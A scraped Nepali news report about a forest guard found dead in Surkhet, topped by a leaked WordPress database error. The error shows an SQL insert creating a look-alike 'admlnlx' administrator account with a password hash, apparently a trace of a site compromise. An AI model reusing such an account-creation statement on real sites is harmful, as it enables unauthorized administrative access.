WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BqKewIYnlGMdO2FXJJRszBOPO/7r/R.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:24:01', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सुर्खेत पश्चिममा रहेको चौकुने गाउँपालिका–४ बिजौरा पोस्टमा कार्यरत वनरक्षक मृतावस्थामा फेला परेका छन् । वीरेन्द्रनगर नगरपालिका– १२ सुर्खेत निवासी ४६ वर्षीय वनरक्षक महानन्द आचार्य शनिबार साँझ मृत अवस्थामा फेला परेका हुन् । उनलाई चौकुने गाउँपालिका– ४ भुँडेभावरका रहेको कर्णाली सामुदायिक वनका अध्यक्ष गङ्गाराम बिसीको घरमा मृतावस्थामा फेला पारिएको जिल्ला प्रहरी कार्यालय सुर्खेतका सूचना अधिकारी एवं प्रहरी नायब उपरीक्षक रामप्रसाद घर्तीले जानकारी दिए ।
बिसीको घरमा बसेका वनरक्षक बिहान अबेरसम्म नउठेपछि ९ बजे उनको सुत्ने कोठामा हेर्दा कुनामा मृतावस्थामा भेटिएको भनी स्थानीयले प्रहरीलाई खबर गरेको घर्तीले बताए । सोमबार इलाका प्रहरी कार्यालय बाबियाचौर सुर्खेतबाट प्रहरी निरीक्षक टेकबहादुर देउवाको टोली पुगेर स्थलगत मुचुल्का गरी शव परीक्षणका लागि कर्णाली प्रदेश अस्पताल सुर्खेतमा ल्याइएको तर जाहेरी नआएकाले परीक्षण नभएको प्रहरीले जनाएको छ ।